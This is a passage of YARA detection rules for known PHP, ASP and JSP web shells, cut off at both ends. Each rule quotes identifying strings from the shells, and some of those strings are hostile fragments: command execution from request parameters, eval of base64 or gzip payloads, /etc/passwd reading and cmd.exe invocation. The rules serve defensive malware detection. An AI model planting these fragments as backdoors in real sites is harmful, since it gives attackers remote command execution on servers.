hash = "0061d800aee63ccaf41d2d62ec15985d" strings: $s9 = "Response.Write \"<font face=wingdings size=3><a href='\"&dosyaPath&\"?status=18&" condition: all of them } rule webshell_Worse_Linux_Shell { meta: description = "Web Shell - file Worse Linux Shell.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "8338c8d9eab10bd38a7116eb534b5fa2" strings: $s0 = "system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD" condition: all of them } rule webshell_zacosmall { meta: description = "Web Shell - file zacosmall.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "5295ee8dc2f5fd416be442548d68f7a6" strings: $s0 = "if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr>" condition: all of them } rule webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit { meta: description = "Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "c6eeacbe779518ea78b8f7ed5f63fc11" strings: $s1 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword condition: all of them } rule webshell_redirect { meta: description = "Web Shell - file redirect.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "97da83c6e3efbba98df270cc70beb8f8" strings: $s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" " condition: all of them } rule webshell_jsp_cmdjsp { meta: description = "Web Shell - file cmdjsp.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "b815611cc39f17f05a73444d699341d4" strings: $s5 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword condition: all of them } rule webshell_Java_Shell { meta: description = "Web Shell - file Java Shell.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "36403bc776eb12e8b7cc0eb47c8aac83" strings: $s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword $s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword condition: 1 of them } rule webshell_asp_1d { meta: description = "Web Shell - file 1d.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "fad7504ca8a55d4453e552621f81563c" strings: $s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO" condition: all of them } rule webshell_jsp_IXRbE { meta: description = "Web Shell - file IXRbE.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "e26e7e0ebc6e7662e1123452a939e2cd" strings: $s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application" condition: all of them } rule webshell_PHP_G5 { meta: description = "Web Shell - file G5.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "95b4a56140a650c74ed2ec36f08d757f" strings: $s3 = "echo \"Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op" condition: all of them } rule webshell_PHP_r57142 { meta: description = "Web Shell - file r57142.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "0911b6e6b8f4bcb05599b2885a7fe8a8" strings: $s0 = "$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');" fullword condition: all of them } rule webshell_jsp_tree { meta: description = "Web Shell - file tree.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "bcdf7bbf7bbfa1ffa4f9a21957dbcdfa" strings: $s5 = "$('#tt2').tree('options').url = \"selectChild.action?checki" $s6 = "String basePath = request.getScheme()+\"://\"+request.getServerName()+\":\"+requ" condition: all of them } rule webshell_C99madShell_v_3_0_smowu { meta: description = "Web Shell - file smowu.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "74e1e7c7a6798f1663efb42882b85bee" strings: $s2 = "<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: Enter ::</b><for" $s8 = "<p><font color=red>Wordpress Not Found! <input type=text id=\"wp_pat\"><input ty" condition: 1 of them } rule webshell_simple_backdoor { meta: description = "Web Shell - file simple-backdoor.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "f091d1b9274c881f8e41b2f96e6b9936" strings: $s0 = "$cmd = ($_REQUEST['cmd']);" fullword $s1 = "if(isset($_REQUEST['cmd'])){" fullword $s4 = "system($cmd);" fullword condition: 2 of them } rule webshell_PHP_404 { meta: description = "Web Shell - file 404.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "078c55ac475ab9e028f94f879f548bca" strings: $s4 = "<span>Posix_getpwuid (\"Read\" /etc/passwd)" condition: all of them } rule webshell_Macker_s_Private_PHPShell { meta: description = "Web Shell - file Macker's Private PHPShell.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "e24cbf0e294da9ac2117dc660d890bb9" strings: $s3 = "echo \"<tr><td class=\\\"silver border\\\"> <strong>Server's PHP Version:&n" $s4 = " <?php echo buildUrl(\"<font color=\\\"navy\\\">[" $s7 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type=" condition: all of them } rule webshell_Antichat_Shell_v1_3_2 { meta: description = "Web Shell - file Antichat Shell v1.3.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "40d0abceba125868be7f3f990f031521" strings: $s3 = "$header='<html><head><title>'.getenv(\"HTTP_HOST\").' - Antichat Shell</title><m" condition: all of them } rule webshell_Safe_mode_breaker { meta: description = "Web Shell - file Safe mode breaker.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "5bd07ccb1111950a5b47327946bfa194" strings: $s5 = "preg_match(\"/SAFE\\ MODE\\ Restriction\\ in\\ effect\\..*whose\\ uid\\ is(" $s6 = "$path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : NULL)." condition: 1 of them } rule webshell_Sst_Sheller { meta: description = "Web Shell - file Sst-Sheller.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "d93c62a0a042252f7531d8632511ca56" strings: $s2 = "echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'>" $s3 = "<? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)" condition: all of them } rule webshell_jsp_list { meta: description = "Web Shell - file list.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "1ea290ff4259dcaeb680cec992738eda" strings: $s0 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword $s2 = "out.print(\") <A Style='Color: \" + fcolor.toString() + \";' HRef='?file=\" + fn" $s7 = "if(flist[i].canRead() == true) out.print(\"r\" ); else out.print(\"-\");" fullword condition: all of them } rule webshell_PHPJackal_v1_5 { meta: description = "Web Shell - file PHPJackal v1.5.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "d76dc20a4017191216a0315b7286056f" strings: $s7 = "echo \"<center>${t}MySQL cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><form" $s8 = "echo \"<center>${t}Wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr" condition: all of them } rule webshell_customize { meta: description = "Web Shell - file customize.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "d55578eccad090f30f5d735b8ec530b1" strings: $s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z" condition: all of them } rule webshell_s72_Shell_v1_1_Coding { meta: description = "Web Shell - file s72 Shell v1.1 Coding.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "c2e8346a5515c81797af36e7e4a3828e" strings: $s5 = "<font face=\"Verdana\" style=\"font-size: 8pt\" color=\"#800080\">Buradan Dosya " condition: all of them } rule webshell_jsp_sys3 { meta: description = "Web Shell - file sys3.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "b3028a854d07674f4d8a9cf2fb6137ec" strings: $s1 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">" fullword $s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\"" $s9 = "<%@page contentType=\"text/html;charset=gb2312\"%>" fullword condition: all of them } rule webshell_jsp_guige02 { meta: description = "Web Shell - file guige02.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "a3b8b2280c56eaab777d633535baf21d" strings: $s0 = "????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff" $s1 = "<%@page contentType=\"text/html; charset=GBK\" import=\"java.io.*;\"%><%!private" condition: all of them } rule webshell_php_ghost { meta: description = "Web Shell - file ghost.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "38dc8383da0859dca82cf0c943dbf16d" strings: $s1 = "<?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'" $s6 = "//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***" $s7 = "preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(KmU(\"" fullword condition: all of them } rule webshell_WinX_Shell { meta: description = "Web Shell - file WinX Shell.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "17ab5086aef89d4951fe9b7c7a561dda" strings: $s5 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">Filenam" $s8 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">File: </" condition: all of them } rule webshell_Crystal_Crystal { meta: description = "Web Shell - file Crystal.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "fdbf54d5bf3264eb1c4bff1fac548879" strings: $s1 = "show opened ports</option></select><input type=\"hidden\" name=\"cmd_txt\" value" $s6 = "\" href=\"?act=tools\"><font color=#CC0000 size=\"3\">Tools</font></a></span></f" condition: all of them } rule webshell_r57_1_4_0 { meta: description = "Web Shell - file r57.1.4.0.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "574f3303e131242568b0caf3de42f325" strings: $s4 = "@ini_set('error_log',NULL);" fullword $s6 = "$pass='abcdef1234567890abcdef1234567890';" fullword $s7 = "@ini_restore(\"disable_functions\");" fullword $s9 = "@ini_restore(\"safe_mode_exec_dir\");" fullword condition: all of them } rule webshell_jsp_hsxa1 { meta: description = "Web Shell - file hsxa1.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "5686d5a38c6f5b8c55095af95c2b0244" strings: $s0 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%><jsp:directive.page import=\"ja" condition: all of them } rule webshell_asp_ajn { meta: description = "Web Shell - file ajn.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "aaafafc5d286f0bff827a931f6378d04" strings: $s1 = "seal.write \"Set WshShell = CreateObject(\"\"WScript.Shell\"\")\" & vbcrlf" fullword $s6 = "seal.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreateOve" condition: all of them } rule webshell_php_cmd { meta: description = "Web Shell - file cmd.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "c38ae5ba61fd84f6bbbab98d89d8a346" strings: $s0 = "if($_GET['cmd']) {" fullword $s1 = "// cmd.php = Command Execution" fullword $s7 = " system($_GET['cmd']);" fullword condition: all of them } rule webshell_asp_list { meta: description = "Web Shell - file list.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "1cfa493a165eb4b43e6d4cc0f2eab575" strings: $s0 = "<INPUT TYPE=\"hidden\" NAME=\"type\" value=\"<%=tipo%>\">" fullword $s4 = "Response.Write(\"<h3>FILE: \" & file & \"</h3>\")" fullword condition: all of them } rule webshell_PHP_co { meta: description = "Web Shell - file co.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "62199f5ac721a0cb9b28f465a513874c" strings: $s0 = "cGX6R9q733WvRRjISKHOp9neT7wa6ZAD8uthmVJV" fullword $s11 = "6Mk36lz/HOkFfoXX87MpPhZzBQH6OaYukNg1OE1j" fullword condition: all of them } rule webshell_PHP_150 { meta: description = "Web Shell - file 150.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "400c4b0bed5c90f048398e1d268ce4dc" strings: $s0 = "HJ3HjqxclkZfp" $s1 = "<? eval(gzinflate(base64_decode('" fullword condition: all of them } rule webshell_jsp_cmdjsp_2 { meta: description = "Web Shell - file cmdjsp.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "1b5ae3649f03784e2a5073fa4d160c8b" strings: $s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /C \" + cmd);" fullword $s4 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword condition: all of them } rule webshell_PHP_c37 { meta: description = "Web Shell - file c37.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "d01144c04e7a46870a8dd823eb2fe5c8" strings: $s3 = "array('cpp','cxx','hxx','hpp','cc','jxx','c++','vcproj')," $s9 = "++$F; $File = urlencode($dir[$dirFILE]); $eXT = '.:'; if (strpos($dir[$dirFILE]," condition: all of them } rule webshell_PHP_b37 { meta: description = "Web Shell - file b37.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "0421445303cfd0ec6bc20b3846e30ff0" strings: $s0 = "xmg2/G4MZ7KpNveRaLgOJvBcqa2A8/sKWp9W93NLXpTTUgRc" condition: all of them } rule webshell_php_backdoor { meta: description = "Web Shell - file php-backdoor.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7" strings: $s1 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))" fullword $s2 = "<pre><form action=\"<? echo $PHP_SELF; ?>\" METHOD=GET >execute command: <input " condition: all of them } rule webshell_asp_dabao { meta: description = "Web Shell - file dabao.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "3919b959e3fa7e86d52c2b0a91588d5d" strings: $s2 = " Echo \"<input type=button name=Submit onclick=\"\"document.location ='\" &" $s8 = " Echo \"document.Frm_Pack.FileName.value=\"\"\"\"+year+\"\"-\"\"+(month+1)+\"\"-" condition: all of them } rule webshell_php_2 { meta: description = "Web Shell - file 2.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "267c37c3a285a84f541066fc5b3c1747" strings: $s0 = "<?php assert($_REQUEST[\"c\"]);?> " fullword condition: all of them } rule webshell_asp_cmdasp { meta: description = "Web Shell - file cmdasp.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "57b51418a799d2d016be546f399c2e9b" strings: $s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword $s7 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)" fullword condition: all of them } rule webshell_spjspshell { meta: description = "Web Shell - file spjspshell.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "d39d51154aaad4ba89947c459a729971" strings: $s7 = "Unix:/bin/sh -c tar vxf xxx.tar Windows:c:\\winnt\\system32\\cmd.exe /c type c:" condition: all of them } rule webshell_jsp_action { meta: description = "Web Shell - file action.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "5a7d931094f5570aaf5b7b3b06c3d8c0" strings: $s1 = "String url=\"jdbc:oracle:thin:@localhost:1521:orcl\";" fullword $s6 = "<%@ page contentType=\"text/html;charset=gb2312\"%>" fullword condition: all of them } rule webshell_Inderxer { meta: description = "Web Shell - file Inderxer.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "9ea82afb8c7070817d4cdf686abe0300" strings: $s4 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input typ" condition: all of them } rule webshell_asp_Rader { meta: description = "Web Shell - file Rader.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "ad1a362e0a24c4475335e3e891a01731" strings: $s1 = "FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0" $s3 = "m\" target=inf onClick=\"window.open('?action=help','inf','width=450,height=400 " condition: all of them } rule webshell_c99_madnet_smowu { meta: description = "Web Shell - file smowu.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "3aaa8cad47055ba53190020311b0fb83" strings: $s0 = "//Authentication" fullword $s1 = "$login = \"" fullword $s2 = "eval(gzinflate(base64_decode('" $s4 = "//Pass" $s5 = "$md5_pass = \"" $s6 = "//If no pass then hash" condition: all of them } rule webshell_php_moon { meta: description = "Web Shell - file moon.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "2a2b1b783d3a2fa9a50b1496afa6e356" strings: $s2 = "echo '<option value=\"create function backshell returns string soname" $s3 = "echo \"<input name='p' type='text' size='27' value='\".dirname(_FILE_).\"" $s8 = "echo '<option value=\"select cmdshell(\\'net user " condition: 2 of them } rule webshell_jsp_jdbc { meta: description = "Web Shell - file jdbc.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "23b0e6f91a8f0d93b9c51a2a442119ce" strings: $s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z" condition: all of them } rule webshell_minupload { meta: description = "Web Shell - file minupload.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "ec905a1395d176c27f388d202375bdf9" strings: $s0 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\"> " fullword $s9 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859" condition: all of them } rule webshell_ELMALISEKER_Backd00r { meta: description = "Web Shell - file ELMALISEKER Backd00r.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "3aa403e0a42badb2c23d4a54ef43e2f4" strings: $s0 = "response.write(\"<tr><td bgcolor=#F8F8FF><input type=submit name=cmdtxtFileOptio" $s2 = "if FP = \"RefreshFolder\" or request.form(\"cmdOption\")=\"DeleteFolder\" or req" condition: all of them } rule webshell_PHP_bug_1_ { meta: description = "Web Shell - file bug (1).php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "91c5fae02ab16d51fc5af9354ac2f015" strings: $s0 = "@include($_GET['bug']);" fullword condition: all of them } rule webshell_caidao_shell_hkmjj { meta: description = "Web Shell - file hkmjj.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "e7b994fe9f878154ca18b7cde91ad2d0" strings: $s6 = "codeds=\"Li#uhtxhvw+%{{%,#@%{%#wkhq#hydo#uhtxhvw+%knpmm%,#hqg#li\" " fullword condition: all of them } rule webshell_jsp_asd { meta: description = "Web Shell - file asd.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "a042c2ca64176410236fcc97484ec599" strings: $s3 = "<%@ page language=\"java\" pageEncoding=\"gbk\"%>" fullword $s6 = "<input size=\"100\" value=\"<%=application.getRealPath(\"/\") %>\" name=\"url" condition: all of them } rule webshell_jsp_inback3 { meta: description = "Web Shell - file inback3.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "ea5612492780a26b8aa7e5cedd9b8f4e" strings: $s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application" condition: all of them } rule webshell_metaslsoft { meta: description = "Web Shell - file metaslsoft.php" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "aa328ed1476f4a10c0bcc2dde4461789" strings: $s7 = "$buff .= \"<tr><td><a href=\\\"?d=\".$pwd.\"\\\">[ $folder ]</a></td><td>LINK</t" condition: all of them } rule webshell_asp_Ajan { meta: description = "Web Shell - file Ajan.asp" author = "Florian Roth" date = "2014/01/28" score = 70 hash = "b6f468252407efc2318639da22b08af0" strings: $s3 = "entrika.write \"BinaryStream.SaveToFile \"\"c:\\downloaded.zip\"\", adSaveCreate" condition: all of them } rule webshell_config_myxx_zend { meta: description = "Web Shell - from files config.jsp, myxx.jsp, zend.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "d44df8b1543b837e57cc8f25a0a68d92" hash1 = "e0354099bee243702eb11df8d0e046df" hash2 = "591ca89a25f06cf01e4345f98a22845c" strings: $s3 = ".println(\"<a href=\\\"javascript:alert('You Are In File Now ! Can Not Pack !');" condition: all of them } rule webshell_browser_201_3_ma_download { meta: description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, download.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "37603e44ee6dc1c359feb68a0d566f76" hash1 = "a7e25b8ac605753ed0c438db93f6c498" hash2 = "fb8c6c3a69b93e5e7193036fd31a958d" hash3 = "4cc68fa572e88b669bce606c7ace0ae9" hash4 = "fa87bbd7201021c1aefee6fcc5b8e25a" strings: $s2 = "<small>jsp File Browser version <%= VERSION_NR%> by <a" $s3 = "else if (fName.endsWith(\".mpg\") || fName.endsWith(\".mpeg\") || fName.endsWith" condition: all of them } rule webshell_itsec_itsecteam_shell_jHn { meta: description = "Web Shell - from files itsec.php, itsecteam_shell.php, jHn.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "8ae9d2b50dc382f0571cd7492f079836" hash1 = "bd6d3b2763c705a01cc2b3f105a25fa4" hash2 = "40c6ecf77253e805ace85f119fe1cebb" strings: $s4 = "echo $head.\"<font face='Tahoma' size='2'>Operating System : \".php_uname().\"<b" $s5 = "echo \"<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'" condition: all of them } rule webshell_ghost_source_icesword_silic { meta: description = "Web Shell - from files ghost_source.php, icesword.php, silic.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "cbf64a56306c1b5d98898468fc1fdbd8" hash1 = "6e20b41c040efb453d57780025a292ae" hash2 = "437d30c94f8eef92dc2f064de4998695" strings: $s3 = "if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $" $s6 = "if(!empty($_FILES['ufp']['name'])){if($_POST['ufn'] != '') $upfilename = $_POST[" condition: all of them } rule webshell_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_spy2009_m_ma3_xxx { meta: description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "2eeb8bf151221373ee3fd89d58ed4d38" hash1 = "059058a27a7b0059e2c2f007ad4675ef" hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf" hash3 = "76037ebd781ad0eac363d56fc81f4b4f" hash4 = "8b457934da3821ba58b06a113e0d53d9" hash5 = "fc44f6b4387a2cb50e1a63c66a8cb81c" hash6 = "14e9688c86b454ed48171a9d4f48ace8" hash7 = "b330a6c2d49124ef0729539761d6ef0b" hash8 = "d71716df5042880ef84427acee8b121e" hash9 = "341298482cf90febebb8616426080d1d" hash10 = "29aebe333d6332f0ebc2258def94d57e" hash11 = "42654af68e5d4ea217e6ece5389eb302" hash12 = "88fc87e7c58249a398efd5ceae636073" hash13 = "4a812678308475c64132a9b56254edbc" hash14 = "9626eef1a8b9b8d773a3b2af09306a10" hash15 = "344f9073576a066142b2023629539ebd" hash16 = "32dea47d9c13f9000c4c807561341bee" hash17 = "90a5ba0c94199269ba33a58bc6a4ad99" hash18 = "655722eaa6c646437c8ae93daac46ae0" hash19 = "b9744f6876919c46a29ea05b1d95b1c3" hash20 = "9c94637f76e68487fa33f7b0030dd932" hash21 = "6acc82544be056580c3a1caaa4999956" hash22 = "6aa32a6392840e161a018f3907a86968" hash23 = "349ec229e3f8eda0f9eb918c74a8bf4c" hash24 = "3ea688e3439a1f56b16694667938316d" hash25 = "ab77e4d1006259d7cbc15884416ca88c" hash26 = "71097537a91fac6b01f46f66ee2d7749" hash27 = "2434a7a07cb47ce25b41d30bc291cacc" hash28 = "7a4b090619ecce6f7bd838fe5c58554b" strings: $s8 = "\"<form action=\\\"\"+SHELL_NAME+\"?o=upload\\\" method=\\\"POST\\\" enctype=" $s9 = "<option value='reg query \\\"HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\T" condition: all of them } rule webshell_2_520_job_ma1_ma4_2 { meta: description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, ma1.jsp, ma4.jsp, 2.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "64a3bf9142b045b9062b204db39d4d57" hash1 = "9abd397c6498c41967b4dd327cf8b55a" hash2 = "56c005690da2558690c4aa305a31ad37" hash3 = "532b93e02cddfbb548ce5938fe2f5559" hash4 = "6e0fa491d620d4af4b67bae9162844ae" hash5 = "7eabe0f60975c0c73d625b7ddf7b9cbd" strings: $s4 = "_url = \"jdbc:microsoft:sqlserver://\" + dbServer + \":\" + dbPort + \";User=\" " $s9 = "result += \"<meta http-equiv=\\\"refresh\\\" content=\\\"2;url=\" + request.getR" condition: all of them } rule webshell_000_403_807_a_c5_config_css_dm_he1p_JspSpy_JspSpyJDK5_JspSpyJDK51_luci_jsp_xxx { meta: description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, t00ls.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "2eeb8bf151221373ee3fd89d58ed4d38" hash1 = "059058a27a7b0059e2c2f007ad4675ef" hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf" hash3 = "76037ebd781ad0eac363d56fc81f4b4f" hash4 = "8b457934da3821ba58b06a113e0d53d9" hash5 = "d44df8b1543b837e57cc8f25a0a68d92" hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c" hash7 = "14e9688c86b454ed48171a9d4f48ace8" hash8 = "b330a6c2d49124ef0729539761d6ef0b" hash9 = "d71716df5042880ef84427acee8b121e" hash10 = "341298482cf90febebb8616426080d1d" hash11 = "29aebe333d6332f0ebc2258def94d57e" hash12 = "42654af68e5d4ea217e6ece5389eb302" hash13 = "88fc87e7c58249a398efd5ceae636073" hash14 = "4a812678308475c64132a9b56254edbc" hash15 = "9626eef1a8b9b8d773a3b2af09306a10" hash16 = "e0354099bee243702eb11df8d0e046df" hash17 = "344f9073576a066142b2023629539ebd" hash18 = "32dea47d9c13f9000c4c807561341bee" hash19 = "90a5ba0c94199269ba33a58bc6a4ad99" hash20 = "655722eaa6c646437c8ae93daac46ae0" hash21 = "b9744f6876919c46a29ea05b1d95b1c3" hash22 = "9c94637f76e68487fa33f7b0030dd932" hash23 = "6acc82544be056580c3a1caaa4999956" hash24 = "6aa32a6392840e161a018f3907a86968" hash25 = "591ca89a25f06cf01e4345f98a22845c" hash26 = "349ec229e3f8eda0f9eb918c74a8bf4c" hash27 = "3ea688e3439a1f56b16694667938316d" hash28 = "ab77e4d1006259d7cbc15884416ca88c" hash29 = "71097537a91fac6b01f46f66ee2d7749" hash30 = "2434a7a07cb47ce25b41d30bc291cacc" hash31 = "7a4b090619ecce6f7bd838fe5c58554b" strings: $s0 = "ports = \"21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500\";" fullword $s1 = "private static class VEditPropertyInvoker extends DefaultInvoker {" fullword condition: all of them } rule webshell_wso2_5_1_wso2_5_wso2 { meta: description = "Web Shell - from files wso2.5.1.php, wso2.5.php, wso2.php" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "dbeecd555a2ef80615f0894027ad75dc" hash1 = "7c8e5d31aad28eb1f0a9a53145551e05" hash2 = "cbc44fb78220958f81b739b493024688" strings: $s7 = "$opt_charsets .= '<option value=\"'.$item.'\" '.($_POST['charset']==$item?'selec" $s8 = ".'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode($f['na" condition: all of them } rule webshell_000_403_c5_queryDong_spyjsp2010_t00ls { meta: description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp, t00ls.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "2eeb8bf151221373ee3fd89d58ed4d38" hash1 = "059058a27a7b0059e2c2f007ad4675ef" hash2 = "8b457934da3821ba58b06a113e0d53d9" hash3 = "90a5ba0c94199269ba33a58bc6a4ad99" hash4 = "655722eaa6c646437c8ae93daac46ae0" hash5 = "9c94637f76e68487fa33f7b0030dd932" strings: $s8 = "table.append(\"<td nowrap> <a href=\\\"#\\\" onclick=\\\"view('\"+tbName+\"')" $s9 = "\"<p><input type=\\\"hidden\\\" name=\\\"selectDb\\\" value=\\\"\"+selectDb+\"" condition: all of them } rule webshell_404_data_suiyue { meta: description = "Web Shell - from files 404.jsp, data.jsp, suiyue.jsp" author = "Florian Roth" date = "2014/01/28" score = 70 super_rule = 1 hash0 = "7066f4469c3ec20f4890535b5f299122" hash1 = "9f54aa7b43797be9bab7d094f238b4ff" hash2 = "c93d5bdf5cf62fe22e299d0f2b865ea7" strings: $s3 = " sbCopy.append(\"<input type=button name=goback value=' \"+strBack[languageNo]+" condition: all of them } rule webshell_r57shell_r57shell127_SnIpEr_SA_Shell_EgY_SpIdEr_ShElL_V2_r57_xxx { meta: description = "Web Shell - from files r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php" author = 